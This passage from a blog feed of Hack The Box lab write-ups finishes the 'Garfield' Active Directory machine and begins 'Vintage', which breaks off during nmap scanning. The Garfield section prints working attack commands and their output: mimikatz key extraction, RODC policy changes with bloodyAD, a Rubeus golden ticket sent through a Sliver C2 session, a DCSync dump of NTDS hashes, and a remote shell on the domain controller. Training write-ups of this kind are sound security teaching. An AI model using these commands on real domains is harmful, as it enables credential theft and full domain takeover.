      aes256_hmac       (4096) : d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
      aes128_hmac       (4096) : 124c0fd09f5fa4efca8d9f1da91369e5
      des_cbc_md5       (4096) : d540fe6192b9ecfe

 * NTLM-Strong-NTOWF
    Random Value : f4b51c2c0d006172304e31dbc6e0de6b

mimikatz(commandline) # exit
Bye!</code></pre></div><p>And we get our AES256 hash.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240</code></pre></div><p>Now before forging, we need to modify the RODC password policy, making a TierZero such as Administrator is eligible for caching.</p><p>For that we will use L.Wilson_ADM access.</p><ol start="11"><li><p><em>Tier Zero Abuse</em></p></li></ol><p>Only back with bloodyAD</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 set object 'RODC01$' msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=garfield,DC=HTB' -v 'CN=Administrator,CN=Users,DC=garfield,DC=HTB'
[+] RODC01$'s msDS-RevealOnDemandGroup has been updated</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 set object 'RODC01$' msDS-NeverRevealGroup                                                                                                                                 
[+] RODC01$'s msDS-NeverRevealGroup has been updated</code></pre></div><p>Done, now we can do Golden ticket attack.</p><ol start="12"><li><p><em>Sliver C2 and Rubeus Loader</em></p></li></ol><p>Back to Sliver:</p><ul><li><p>rubeus --in-process golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:administrator /id:500 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[server] sliver (INTEGRAL_RISK) &gt; rubeus --in-process golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:administrator.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:administrator /id:500 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : GARFIELD.HTB (GARFIELD)
[*] SID            : S-1-5-21-2502726253-3859040611-225969357
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : garfield.htb

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'administrator@garfield.htb'

[*] AuthTime       : 4/6/2026 9:12:54 AM
[*] StartTime      : 4/6/2026 9:12:54 AM
[*] EndTime        : 4/6/2026 7:12:54 PM
[*] RenewTill      : 4/13/2026 9:12:54 AM

[*] base64(ticket.kirbi):

      doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB6bLXLBJFCWb9uZx/q7aADcKFlBGN3V2WuJ4MlmaBb9py9qsNQC+UDgbjcLMilgo/To/WTuCZS6Jy7ZwoiEpaxeexAn1xxBrZoaU7VbQP1vxrkw5oWnAxan4q0HnPGOPxgvz+o8vLlVMbE6I0MDpdyhDoqwaozQhqvfswL+RrvHRi5x8MvTT3D7SbgLl2UlIhy2z2UReaBfb96VWcJx657lOrFhqL1m11hueXvaEfIIfinv3pqQwxrxZBjqF2pfJAur051VHREUUhNFWSb59hFYfphRL9W3VPaw/NgyrmNOASybQaIq4nW7jm5pE98QvWOqmyriJ26FIfEvjZkJ9boNO66YlSmOTsMgjFpILXyN4TsJEBBdW1ciU8QsVeW4ZRRqqj5luUxde7k9+aHT+9/e96e5O1v2ABXGRj4RPRqWa0Jb/SNej71NHvZH+mkInLF9YGibEitT3amIL17j1gJJNQ4iv/buIm7tlN4b+z0rTd7J8nRqODLT+2W2StYhbgu8l5E72o9oxR5/xUTShj4g5Up4J2diXRakGJWPDK1YY36+ZoZGe7R7Ieo65s7NdqEVeooM7q9nI8qt1TJXjkkb8taTp/QUahGEFHbkjXK+HrcKnDvSPH4NPca6C7Sm4UzZz+gW0ySZipxaKwgfGLFia6K8D622xv2VLuY67h2QK4vv3Xi1/rN1f3bJcwpCbHneOu3/dRE8JbxnYKGRSMXP/4d0QNU2xHrOxTRiP3IAXF+BPmV3o5/ByIVaO3t30BWf3TFwkC197F+djE1TuBItpQ1x0PJLeQKbdC4edPqauHzKqBBWv3LuMUHyDEjKIbBCwl5l/wpZkk9e2NwGxE2YgpcjRu23srTn8ipuS+K7P0We1iINKHgVd5SGOrye8/rRWDZItNwzvC0FUN6TNOpgXQt0ci/or5mfq+tJP6BeNrCt6FDb28UNG+BsXcRwcx40fWmSWplxYglyohAY8UgYPlMad9s6YXzRZSA4zr6fMsuTttnARtRPZU7ZSMx97vcbHr+frdl0sQ9aDC9I2CBc4pLs7i15sUhBo8y4ITY/70VNw5C76XjMl4LA6xfIYxDVFnuWPiztXSMU/i54olKMUXPpyxZvSwQVjB0VsVUmgDwqXpF0/WldXg46Io60yYgjf++9szhQuupc/majZOqaSqnEVSHbYZymp47MO5thjWGjHe+1n174VVSPKsyZVRf2nI7gu1w8DaQXqPp5p17g9lvlWJtSdf+LIKlp0Q9XPr+A0QRCnHT8vN7V7b05z+9pnraqsU+8ZEnJkAvDn10Mpb8xmSYC1IXlkFhnD5UjvS04YvERY+H7dQHnQMuPxbnuq1zmkKS3BH7yWoWopx83Y94vpcSp13TL7O/scKTh5L1XMY3qLysuDpIU0Gb/o4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQg9Ex0vcPyjc3ihyw+j94DUZAJ6x9s8aYU3C5Yj8rhyrqhDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNYWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQwNjE2MTI1NFqlERgPMjAyNjA0MDYxNjEyNTRaphEYDzIwMjYwNDA3MDIxMjU0WqcRGA8yMDI2MDQxMzE2MTI1NFqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=


[*] Ticket written to administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi




[server] sliver (INTEGRAL_RISK) &gt; download administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi

[*] Wrote 1430 bytes (1 file successfully, 0 files unsuccessfully) to administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi</code></pre></div><p>Now we have the kirbi file, let&#8217;s just convert the ticket.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" impacket-ticketConverter administrator_2026_04_06_16_12_54_administrator_to_krbtgt@GARFIELD.HTB.kirbi administrator.ccache 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done</code></pre></div><p>We now have the ticket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=administrator.ccache                                         
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ klist
Ticket cache: FILE:administrator.ccache
Default principal: administrator@GARFIELD.HTB

Valid starting       Expires              Service principal
04/06/2026 12:12:54  04/06/2026 22:12:54  krbtgt/garfield.htb@GARFIELD.HTB
        renew until 04/13/2026 12:12:54</code></pre></div><ol start="13"><li><p><em>DCSycn Attack and Gain Main DC Administrator</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec smb DC01 -u Administrator --use-kcache --ntds
SMB         DC01            445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         DC01            445    DC01             [+] GARFIELD.HTB\Administrator from ccache (Pwn3d!)
SMB         DC01            445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         DC01            445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee238f6debc752010428f20875b092d5:::
SMB         DC01            445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         DC01            445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:077a59724e58efbf6608853652a66f80:::
SMB         DC01            445    DC01             krbtgt_8245:1603:aad3b435b51404eeaad3b435b51404ee:445aa4221e751da37a10241d962780e2:::
SMB         DC01            445    DC01             garfield.htb\j.arbuckle:3101:aad3b435b51404eeaad3b435b51404ee:f705091e5d14d5c25ace5f52ea4d8ecb:::
SMB         DC01            445    DC01             garfield.htb\l.wilson:3105:aad3b435b51404eeaad3b435b51404ee:dc6e2c16d8baac7cc239f160783ae2b0:::
SMB         DC01            445    DC01             garfield.htb\l.wilson_adm:3107:aad3b435b51404eeaad3b435b51404ee:798a21df6df33f3b2cf9eeb2adc99fef:::
SMB         DC01            445    DC01             DC01$:1000:aad3b435b51404eeaad3b435b51404ee:22acecfd924465afc92bf3c3631bbc91:::
SMB         DC01            445    DC01             RODC01$:1602:aad3b435b51404eeaad3b435b51404ee:0a3f810964bb5e1f0e52245f73700172:::
SMB         DC01            445    DC01             DC02$:10601:aad3b435b51404eeaad3b435b51404ee:9f3091c0127448716fd54ba4fa078db4:::
SMB         DC01            445    DC01             [+] Dumped 10 NTDS hashes to /root/.nxc/logs/ntds/DC01_DC01_2026-04-06_121908.ntds of which 7 were added to the database
SMB         DC01            445    DC01             [*] To extract only enabled accounts from the output file, run the following command: 
SMB         DC01            445    DC01             [*] grep -iv disabled /root/.nxc/logs/ntds/DC01_DC01_2026-04-06_121908.ntds | cut -d ':' -f1</code></pre></div><p>Now we can just logon (I know dumping the NTLM hashes is very important for you guys):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" impacket-wmiexec administrator@DC01 -k -no-pass                                                                         
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\&gt;whoami
garfield\administrator

C:\&gt;hostname
DC01</code></pre></div><p>That&#8217;s it!</p><p>PS: I kinda feel this machine is having much the same kit as me doing &#8220;HTB DarkZero&#8221; but the much complicated haha!! </p><p>Even the dual Admin and dual C2 really (TBH I recommend Garfield with havoc as C2)</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1h9j!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1h9j!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 424w, https://substackcdn.com/image/fetch/$s_!1h9j!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 848w, https://substackcdn.com/image/fetch/$s_!1h9j!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 1272w, https://substackcdn.com/image/fetch/$s_!1h9j!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1h9j!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png" width="880" height="363" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:363,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:77545,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1h9j!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 424w, https://substackcdn.com/image/fetch/$s_!1h9j!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 848w, https://substackcdn.com/image/fetch/$s_!1h9j!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 1272w, https://substackcdn.com/image/fetch/$s_!1h9j!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aba9ea7-953d-4b64-8364-7abc6ccbeec1_880x363.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/862">labs.hackthebox.com/achievement/machine/2489228/862</a></p></li></ul><p>Until next time and Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Vintage - Windows (Hard)]]></title><description><![CDATA[Discover pre2k via BloodHound, leading to Computers and Users lateral movement to owned 3 SVC account SPN, find User who have DPAPI of higher User and eventually RBCD to local User with Admin rights.]]></description><link>https://byt3n33dl3.substack.com/p/htb-vintage-windows-hard</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-vintage-windows-hard</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 27 Apr 2026 13:50:29 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!nay_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nay_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nay_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 424w, https://substackcdn.com/image/fetch/$s_!nay_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 848w, https://substackcdn.com/image/fetch/$s_!nay_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 1272w, https://substackcdn.com/image/fetch/$s_!nay_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nay_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png" width="713" height="528" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:528,&quot;width&quot;:713,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:163979,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nay_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 424w, https://substackcdn.com/image/fetch/$s_!nay_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 848w, https://substackcdn.com/image/fetch/$s_!nay_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 1272w, https://substackcdn.com/image/fetch/$s_!nay_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F404e0d31-bc6a-45e4-91e0-099ee31240c6_713x528.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB: -</em></p><p>PS And Notes:</p><ul><li><p>Infra Hardened with active Defender and AMSI</p></li><li><p>NTLM Authentication Disabled</p></li><li><p>Administrator Can&#8217;t logon</p></li></ul><p>But still AD playable due to LDAP Objects, and strong Kerberos related.</p><p>This write-up is going to be fast-forward:</p><ul><li><p>Gain User</p></li><li><p>Gain NT SYSTEM</p></li></ul><p>An assumed breach scenario so we start with a creds:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;309983b2-ebfe-45e8-afc1-305c1e72b51e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: P.Rosa
passwd: Rosaisbest123</code></pre></div><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;9820bfb3-4f64-49d8-ae52-ad9c4e2b5063&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.231.205
PING 10.129.231.205 (10.129.231.205) 56(84) bytes of data.
64 bytes from 10.129.231.205: icmp_seq=1 ttl=127 time=387 ms
64 bytes from 10.129.231.205: icmp_seq=2 ttl=127 time=383 ms

--- 10.129.231.205 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 382.898/385.195/387.492/2.297 ms</code></pre></div><p>Continue with Nmap Scanning:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.231.205 -oA nmap/nmap                                              
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.231.205
Host is up (0.48s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49676/tcp open  unknown
49687/tcp open  unknown
60731/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,3268-3269,5985,9389 -sC -sV 10.129.231.205 -oA nmap/nmap-port
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for DC01 (10.129.231.205)
Host is up (0.39s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-07 03:29:55Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: 2m25s
| smb2-time: 
|   date: 
